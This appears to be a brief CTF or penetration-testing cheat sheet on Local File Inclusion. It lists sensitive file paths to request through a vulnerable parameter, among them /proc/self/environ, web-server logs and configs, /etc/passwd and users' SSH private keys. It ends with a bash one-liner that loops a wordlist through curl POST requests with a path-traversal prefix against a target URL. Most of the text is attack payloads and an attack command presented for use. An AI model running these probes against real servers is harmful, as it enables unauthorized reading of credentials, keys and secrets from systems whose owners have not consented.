Local File Inclusion

>/proc/self/cmdline
>/proc/self/maps
>/proc/self/mem
>/proc/self/cwd
>/proc/self/environ
>/proc/self/status

Command which was used to run current process

>/proc/self/cwd/[app source code/..../app.py]

cwd is a symbolic link to current working directory. So we can access source code via it.

>/proc/self/root/etc/passwd

There is a symbolic link to the root in /proc/self, which is used for process running in jails or container

>/var/log/apache2/access.log
>/var/log/apache/access.log
>/var/log/apache2/error.log
>/var/log/apache/error.log
>/usr/local/apache/log/error_log
>/usr/local/apache2/log/error_log
>/var/log/nginx/access.log
>/var/log/nginx/error.log
>/var/log/httpd/error_log
>/etc/httpd/conf/httpd.conf
>/etc/apache2/httpd.conf
>/usr/local/apache2/conf/httpd.conf

Server logs

>/etc/nginx/nginx.conf
>/etc/nginx/sites-enabled/default 
>/etc/nginx/sites-available/default

nginx conf path

>/etc/passwd

Accounts

/home/[user]/.ssh/id_rsa

SSH private key

LFI word list

more LFI paths

ctf/Golem_Web_writeup.md at master · bl4de/ctf

My CTF journey since 2015. Stats, writeups, code snippets, notes, challenges. – ctf/Golem_Web_writeup.md at master · bl4de/ctf

Read More

github.com

>for line in `cat LFI-WordList-Linux`; do echo $line ; curl -X POST --data-urlencode image=/var/..$line [URL]; echo ==; done

Iterate LFI path one liner. LFI wordlist